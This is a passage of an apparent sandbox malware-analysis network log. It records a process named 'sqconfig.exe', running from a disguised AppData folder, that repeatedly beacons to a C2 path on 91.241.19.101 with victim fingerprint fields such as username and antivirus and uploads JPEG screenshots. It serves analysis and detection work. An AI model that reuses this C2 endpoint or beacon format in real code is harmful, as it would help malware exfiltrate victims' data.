                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:37.253222942 CEST17320OUTData Raw: e5 0e 64 44 45 2e 2a 4d b4 6d a7 ca c3 98 8f 14 6d 07 b5 49 8a 36 d2 e5 0e 62 23 12 1f e1 a6 1b 74 3e a2 ac 6d a3 14 72 21 a9 b4 55 fb 37 a1 a6 fd 9d c7 4a b9 b4 d2 81 4b d9 a6 35 51 94 3c b6 1d 41 a4 e6 b4 71 4d 2a 0f 51 fa 52 f6 5d 86 aa 94 28
                                                                  Data Ascii: dDE.*MmmI6b#t>mr!U7JK5Q<AqM*QR](WL(}EOc8T"mtI!EN18i9.())bRS\P2@pKbbNbS)jMd)i1iZHJ)Mu2GZJ)::SEJ)
                                                                  Sep 30, 2021 23:53:37.253479958 CEST17330OUTData Raw: 17 c7 1a a2 6b d7 6a 8a 00 55 52 00 00 76 1c 52 ff 00 c2 c6 f1 8f fd 0c 17 bf f7 d0 ff 00 0a e4 85 1a b0 77 8c ac fd 59 d5 3a b4 a6 ad 25 74 7d 29 a6 f8 5b 44 d2 26 f3 ac b4 e8 a3 94 74 76 25 d8 7d 0b 12 47 e1 56 b5 af f9 00 ea 3f f5 eb 2f fe 80
                                                                  Data Ascii: kjURvRwY:%t})[D&tv%}GV?/kX1Sdchefz1DwUh#4Q]((|$u^]+0%g8kxGZkBIoeiR &3_jZey8nTl\O\
                                                                  Sep 30, 2021 23:53:37.381603003 CEST17333OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:37.381845951 CEST17356OUTData Raw: 18 9e 1f 3a 0f ed 1d 3d f5 28 22 32 cb a7 23 b9 9d 00 19 61 9d 9e 59 65 19 25 43 92 30 46 32 08 ac 40 72 b9 15 d8 58 7f 63 cb e2 bb bd 7e cb 5d b4 13 4a 67 ba b6 b0 b9 dd 04 a6 57 07 f7 6f 23 81 0a 80 58 fc db ce 40 e0 64 e0 73 b0 da 68 ea 63 8e
                                                                  Data Ascii: :=("2#aYe%C0F2@rXc~]JgWo#X@dshcMyWWah8>q8g%k)n\S`JS{E%(bQIA (`:6`QKHAKJZ`- 1EAE-RRQEZNQ@Mh$Z(SE-%
                                                                  Sep 30, 2021 23:53:37.381887913 CEST17364OUTData Raw: 58 da 39 35 fb c7 47 05 59 59 81 04 1e a0 8c 55 3d 22 c3 45 d5 75 99 a4 91 af 6c b4 5b 78 3c eb 82 f2 24 92 c7 c8 50 03 05 01 b2 ec bf c2 38 27 8e 33 57 21 f0 9c 0b 7b 65 05 dc d2 a2 47 7f 73 6b a9 3a 95 f9 12 15 12 16 4c 8e 33 1e e2 33 9e 47 e1
                                                                  Data Ascii: X95GYYU="Eul[x<$P8'3W!{eGsk:L33GG54(ns1[:g;I$p59!mxs]0AZ#QI](r?&WMLQE0KEHL;QEZ(S@vBRGjCE4Q@SLL(BZAKLAJ)){hbJ
                                                                  Sep 30, 2021 23:53:37.381941080 CEST17375OUTData Raw: c4 2d 2d 36 8a 2e 03 a9 45 30 75 a7 53 13 1d 9a 33 4d a5 a6 21 73 40 34 de 69 68 01 d9 a3 34 cc d2 d3 b8 ac 3f 34 6e a6 e6 93 34 5c 2c 3f 34 03 4c cd 00 d1 70 b0 fc d2 ee a6 52 13 45 c2 c4 9b a9 33 4c cd 19 a2 e1 61 fb a8 2d 4c cd 19 a2 e1 61 d9
                                                                  Data Ascii: --6.E0uS3M!s@4ih4?4n4\,?4LpRE3La-La(Xq4nh&4gnh14IM&i\vM&i+Fi.4;h4M!4\vLsHjnUS{I@=h4f4Z;QHRisQf5W&44ah4J@:3LE:Z(
                                                                  Sep 30, 2021 23:53:37.577158928 CEST17379INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:37 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  138192.168.2.34997291.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:37.440303087 CEST17378OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:37.648029089 CEST17379INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:37 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  139192.168.2.34997391.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:37.879827976 CEST17380OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:38.070672035 CEST17425INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:37 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  14192.168.2.34977391.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:52:53.574666977 CEST7503OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:52:53.759567976 CEST7503INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:52:53 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  140192.168.2.34997491.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:37.918447971 CEST17381OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:37.918574095 CEST17381OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:37.918757915 CEST17391OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:37.918865919 CEST17394OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:38.041368008 CEST17419OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:38.042573929 CEST17424OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:53:38.169091940 CEST17428OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:38.169148922 CEST17441OUTData Raw: 18 9e 1f 3a 0f ed 1d 3d f5 28 22 32 cb a7 23 b9 9d 00 19 61 9d 9e 59 65 19 25 43 92 30 46 32 08 ac 40 72 b9 15 d8 58 7f 63 cb e2 bb bd 7e cb 5d b4 13 4a 67 ba b6 b0 b9 dd 04 a6 57 07 f7 6f 23 81 0a 80 58 fc db ce 40 e0 64 e0 73 b0 da 68 ea 63 8e
                                                                  Data Ascii: :=("2#aYe%C0F2@rXc~]JgWo#X@dshcMyWWah8>q8g%k)n\S`JS{E%(bQIA (`:6`QKHAKJZ`- 1EAE-RRQEZNQ@Mh$Z(SE-%
                                                                  Sep 30, 2021 23:53:38.169651985 CEST17444OUTData Raw: 15 bf e2 75 ce a0 bf ee 0a c6 58 ce 2b 97 0a ff 00 75 11 e3 22 dd 66 43 8e 69 c0 73 de a6 11 7b 54 8b 03 1e 8a 6b 67 34 8c 15 29 3e 85 60 b4 e0 86 ae a5 94 ad d1 1b f2 ab 09 a5 5c 3f fc b3 6a cd d6 8a dd 9b 47 0f 37 d0 cc 09 52 04 f6 ad 75 d1 67
                                                                  Data Ascii: uX+u"fCis{Tkg4)>`\?jG7Rug WHUY2/Y<LVf(OjxLViSYK}*}LA-33RZu&/6=j&<W_Ua4T'__k){:~l7pL2c
                                                                  Sep 30, 2021 23:53:38.169681072 CEST17457OUTData Raw: 45 14 50 03 85 29 a6 8e b4 e3 d2 a8 42 51 45 14 84 14 a2 92 96 98 01 a7 0e 94 dc d2 d3 10 ea 29 0d 14 08 5a 51 d6 90 53 a9 83 0a 51 4d cd 28 34 c4 28 a7 52 0a 5e f4 c4 03 ad 06 8a 29 88 05 38 53 7b d2 d3 01 d4 a2 9a 29 73 8a 64 8b 4d 27 9a 09 a4
                                                                  Data Ascii: EP)BQE)ZQSQM(4(R^)8S{)sdM'1j@Ttbh)ZQb)p5Dv-;(<1Rka1iE%(DNBQE!8JMEe;IIhc4iNv"y-?HalHRB-IDP*%
                                                                  Sep 30, 2021 23:53:38.169707060 CEST17460OUTData Raw: 8c ed 20 82 30 32 72 00 19 38 ab 30 f8 46 e2 ea fa ca 1b 6d 4b 4f 9a d6 f1 26 78 ef 90 cb e4 8f 29 0b c8 18 14 0e 08 03 38 d9 ce 46 32 0d 67 52 34 aa 59 cf a6 ab fa f9 15 17 38 df 97 d0 ec f4 4f 8d fa c5 aa f9 3a cd 94 37 f1 b0 c3 4b 09 f2 25 39
                                                                  Data Ascii: 02r80FmKO&x)8F2gR4Y8O:7K%9q?>3_^6b:[f+{;[st,J].W$r3;=SO%V2puO9s<y3k6^YQnwc9W7#oSlo&
                                                                  Sep 30, 2021 23:53:38.399558067 CEST17474INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:38 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  141192.168.2.34997691.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:38.306482077 CEST17474OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:38.479188919 CEST17475INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:38 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  142192.168.2.34997791.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:38.718697071 CEST17476OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:38.908704042 CEST17514INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:38 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  143192.168.2.34997891.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:38.733119965 CEST17476OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----27c9b75bf3a30d742ab67f61da2c5706
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86605
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:38.733257055 CEST17476OUTData Raw: 2d 2d 2d 2d 2d 2d 32 37 63 39 62 37 35 62 66 33 61 33 30 64 37 34 32 61 62 36 37 66 36 31 64 61 32 63 35 37 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------27c9b75bf3a30d742ab67f61da2c5706Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:38.733443975 CEST17486OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:38.733591080 CEST17489OUTData Raw: 1f fe 41 30 ff 00 c0 bf f4 23 5e d5 a1 dc db 78 0b 47 d1 6d 6e d0 0b ad 5e 7d f7 5b bf e5 9c 64 60 67 e9 95 ff 00 c7 ab 8f ba f8 7b 67 e1 88 a1 b3 d4 7c 49 1c 6c 41 2a c6 ca 52 1b 9e c4 64 77 f5 aa 1e 28 d0 a4 d1 97 4f 95 b5 1f b7 47 77 0f 9b 13
                                                                  Data Ascii: A0#^xGmn^}[d`g{g|IlA*Rdw(OGwa{s^MHI3%r7n-QH9t_#['Q4j#W*~?8P..<ByFuaif` OO[Nu<}Fd\=
                                                                  Sep 30, 2021 23:53:38.866656065 CEST17505OUTData Raw: 37 95 9e 98 df 8c 67 3e f4 5c d9 5d d9 f9 1f 6a b4 b8 83 ed 0b be 1f 36 26 4f 31 7d 57 23 e6 1c 8e 94 7b 47 7d c5 ca 42 49 27 27 92 68 ab 30 69 f7 d7 37 b2 59 5b d8 dd 4b 79 19 21 ed e3 85 9a 45 c7 5c a8 19 18 aa dc 82 41 04 10 70 41 18 22 95 d3
                                                                  Data Ascii: 7g>\]j6&O1}W#{G}BI''h0i7Y[Ky!E\ApA"4gkcC_,S@vZZbP)i)h@)h\J)fs@K1Nq(SGjvQ`Rq1N{Qv(.7bI,LTRcq1EqHE?b1F)
                                                                  Sep 30, 2021 23:53:38.866714954 CEST17514OUTData Raw: 8c 97 b3 8b 84 67 03 04 85 e0 1e 71 df f1 ac af 15 ed 5f 14 ea 2a a0 2a ac c4 00 07 03 81 4c d0 fe 2c f8 63 40 b5 b8 b6 b5 d1 f5 06 8a 59 cc c0 39 8f 2b d3 03 39 e7 18 e2 bc f7 c4 7e 2a 97 53 f1 56 a1 ab 58 34 d0 43 75 20 71 14 98 38 f9 40 e4 72
                                                                  Data Ascii: gq_**L,c@Y9+9~*SVX4Cu q8@r;W5j.U:yT3P/#c>zVv[Bcv}i2I$Yw$lQ:Eq~(E#X7JeKNRzF0AiD;b{,/g
                                                                  Sep 30, 2021 23:53:39.004029036 CEST17517OUTData Raw: 02 9c 31 5a 58 cd c8 60 5c 53 d7 8a 5a 4c d3 48 8b dc 5c d2 8a 4a 5a 62 1c 29 7b 53 41 e6 96 81 00 a5 cd 37 3c d0 45 00 3b 70 a3 3e 94 de 68 00 9a 02 c8 7e 78 eb 46 73 48 16 9e 16 99 22 01 9a 90 0c 50 05 3b 1c 50 4b 61 45 2e 28 02 99 22 53 c5 36
                                                                  Data Ascii: 1ZX`\SZLH\JZb){SA7<E;p>h~xFsH"P;PKaE.("S6tLZri)4SJFi)i/o?T?4|z7j':FI+sZ))h@RRRJQ@ERRBc-4S2E>HDUOYO63cOx/y\
                                                                  Sep 30, 2021 23:53:39.004112959 CEST17523OUTData Raw: cd e2 58 f9 f6 ed 20 48 a5 73 f2 87 0e 8a d8 3c 90 40 20 e0 fa 53 27 f0 cd d0 96 d1 6c 2e ad 35 25 b9 9a 4b 74 92 d5 9d 55 64 8c 02 ea de 6a a6 dc 06 07 27 e5 c6 4e 78 35 77 46 bd d2 3c 33 2d 84 2b aa c3 7d e6 6a d6 97 37 13 db c1 28 8e 08 61 62
                                                                  Data Ascii: X Hs<@ S'l.5%KtUdj'Nx5wF<3-+}j7(absr[\:p-\Kp_1{J6o<{8a'o Xu'ooj>?VW,2Ym\`7F280rWFX1Vrd>W)xL<0o1
                                                                  Sep 30, 2021 23:53:39.004172087 CEST17528OUTData Raw: be ce d4 f9 58 73 a2 2e 29 2a 6f b3 35 1e 43 53 e5 62 e6 44 34 54 bf 67 63 47 d9 9b de 8e 56 1c d1 22 a2 a6 fb 3b 51 f6 66 a3 96 41 cf 12 03 49 56 7e cc d4 7d 95 a8 e4 90 73 c4 ad 4b 56 3e ca de 94 86 d9 a8 e4 90 73 c4 86 8a 97 ec cd 47 d9 da 97
                                                                  Data Ascii: Xs.)*o5CSbD4TgcGV";QfAIV~}sKV>sG+hS}3Q*cJ-$kIF{H+RkM6A#\U`r/k,RboZ=#KViEH={)jb49visF=@aj_]NU
                                                                  Sep 30, 2021 23:53:39.004384041 CEST17546OUTData Raw: 7b 11 ff 00 13 ab 4f fa ec bf ce 8c b9 ff 00 b1 bf 99 d7 8f d3 1b f7 1e a3 e2 bf f9 08 47 ff 00 5c c5 73 ac 39 e2 ba 3f 15 9c 6a 11 ff 00 d7 3a e7 09 e6 a3 07 fc 14 63 8f fe 3c 86 e2 97 a5 14 57 59 c0 3b 34 e1 8a 60 14 e0 2a 59 68 78 a5 cd 34 52
                                                                  Data Ascii: {OG\s9?j:c<WY;4`*Yhx4R,vi)vijY$ 8 G-K))D^E?7- (rzkS/J\GxuC4C7_*W|J/(|DTK(cQE(@!{r(@)PD
                                                                  Sep 30, 2021 23:53:39.004569054 CEST17552OUTData Raw: b1 26 68 cd 33 34 66 8b 85 87 93 49 9a 61 6a 4d d4 5c 39 47 e6 82 d5 1e e1 48 5a 97 30 f9 47 93 4d 26 9a 5a 90 b5 4b 65 58 5c d2 13 4c 26 90 b5 4d ca 48 71 6a 69 6a 69 34 d2 6a 5b 2d 21 d9 a6 93 48 4d 34 9a 9b 94 90 e2 69 84 d2 16 a6 e7 35 0d 94
                                                                  Data Ascii: &h34fIajM\9GHZ0GM&ZKeX\L&MHqjiji4j[-!HM4i57JJanhaI34IE3MX}8)i\JBqNI!ja5-SsV>fZ@fisfZ846uv<=$$VaXy dNmd
                                                                  Sep 30, 2021 23:53:39.199330091 CEST17564INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:39 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  144192.168.2.34997991.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:39.160365105 CEST17564OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:39.358942032 CEST17564INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:39 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0
                                                                  Sep 30, 2021 23:53:39.402148008 CEST17564OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:39.402311087 CEST17565OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
